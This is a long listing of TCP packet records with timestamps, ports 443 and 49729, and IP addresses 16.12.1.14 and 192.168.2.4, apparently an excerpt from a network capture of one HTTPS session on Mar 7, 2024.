                                        Mar 7, 2024 10:36:10.397054911 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.397085905 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.397120953 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.397130966 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.397181034 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.398020029 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.398031950 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.398129940 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.398140907 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.398507118 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.399465084 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.399477005 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.399545908 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.399559021 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.399612904 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.400460958 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.400471926 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.400500059 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.400535107 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.400547028 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.400569916 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.400605917 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.401380062 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.401391983 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.401420116 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.401453972 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.401464939 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.401489019 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.401525021 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.402244091 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.402264118 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.402321100 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.402329922 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.402369976 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.402390003 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.402399063 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.402787924 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.403346062 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.403367996 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.403412104 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.403422117 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.403430939 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.403470993 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.403510094 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.404372931 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.404393911 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.404431105 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.404441118 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.404450893 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.404476881 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.404509068 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.405332088 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.405354023 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.405402899 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.405414104 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.405441046 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.405459881 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.405467987 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.405520916 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.407007933 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.407030106 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.407064915 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.407111883 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.407124043 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.407149076 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.407166958 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.408313990 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.408341885 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.408377886 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.408391953 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.408401966 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.408438921 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.408488035 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.409322023 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.409346104 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.409398079 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.409439087 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.409451008 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.409472942 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.409491062 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.410079002 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.410099983 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.410137892 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.410145998 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.410155058 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.410207987 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.410231113 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.410938978 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.410959959 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.411000013 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.411020041 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.411030054 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.411056042 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.411091089 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.412096977 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.412118912 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.412153006 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.412173033 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.412184954 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.412209034 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.412242889 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.413058996 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.413090944 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.413141966 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.413151979 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.413177967 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.413197041 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.413204908 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.413252115 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.414024115 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.414056063 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.414108992 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.414118052 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.414148092 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.414170027 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.414179087 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.414534092 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.414846897 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.414880991 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.414921045 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.414931059 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.414963007 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.414979935 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.414988041 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.415102959 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.415888071 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.415921926 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.415965080 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.415973902 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.415998936 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.416021109 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.416029930 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.416192055 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.416862011 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.416894913 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.416945934 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.416949034 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.416968107 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.416989088 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.417006016 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.417665958 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.417696953 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.417746067 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.417756081 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.417782068 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.417819977 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.417829037 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.418045044 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.418862104 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.418895006 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.418937922 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.418947935 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.418975115 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.418996096 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.419003963 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.419763088 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.419799089 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.419836044 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.419846058 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.419871092 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.419914007 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.419923067 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.420829058 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.420859098 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.420901060 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.420912981 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.420945883 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.420979023 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.420988083 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.421794891 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.421878099 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.421896935 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.421920061 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.421988010 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.422028065 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.422802925 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.422832966 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.422879934 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.422889948 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.422934055 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.422964096 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.422972918 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.423644066 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.423809052 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.423841953 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.423877001 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.423887014 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.423921108 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.423938036 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.423945904 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.424535990 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.464016914 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.464032888 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.464061975 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.464123964 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.464171886 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.464204073 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.464334965 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.465471029 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.465483904 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.465512037 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.465563059 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.465578079 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.465605021 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.465677977 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.466250896 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.466263056 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.466294050 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.466332912 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.466345072 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.466368914 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.466384888 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.467194080 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.467206001 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.467231989 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.467281103 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.467293024 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.467315912 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.467457056 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.467892885 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.467905998 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.467943907 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.467964888 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.467977047 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.468003035 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.468018055 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.706321001 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.706347942 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.706446886 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.706448078 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.706511021 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.706571102 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.707496881 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.707520008 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.707593918 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.707593918 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.707626104 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.707663059 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.707707882 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.707750082 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.708343983 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.708367109 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.708404064 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.708417892 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.708450079 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.708472013 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.709049940 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.709064007 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.709085941 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.709139109 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.709156990 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.709181070 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.709201097 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.709836006 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.709846973 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.709911108 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.709923029 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.710155010 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.710165977 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.710431099 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.710844040 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.710855961 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.710916996 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.711086035 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.711086035 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.711102962 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.711163998 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.711647034 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.711658001 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.711730003 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.711743116 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.711796045 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.712377071 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.712389946 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.712419033 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.712471962 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.712488890 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.712511063 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.712529898 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.713078976 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.713093996 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.713138103 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.713150978 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.713161945 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.713186026 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.713205099 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.713788986 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.713802099 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.713820934 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.713855028 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.713866949 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.713888884 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.713907957 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.715044975 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.715056896 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.715078115 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.715117931 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.715128899 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.715152025 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.715167999 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.715792894 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.715805054 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.715826988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.715868950 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.715882063 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.715910912 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.715929985 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.724168062 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.724252939 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.724286079 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.724364996 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.724430084 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.724510908 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.724545002 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.724594116 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.724612951 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.724625111 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.724652052 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.724677086 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.724730968 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.724824905 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.724901915 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.724922895 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.724936962 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.724963903 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725003004 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725023985 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.725116968 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.725159883 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.725181103 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725193977 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.725220919 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725267887 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725280046 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.725361109 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.725383997 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725395918 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.725421906 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725430012 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.725461960 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725472927 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.725500107 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725544930 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725577116 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.725631952 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725665092 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.725709915 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.725735903 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725747108 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.725775957 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725799084 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.725827932 CET4434972916.12.1.14192.168.2.4
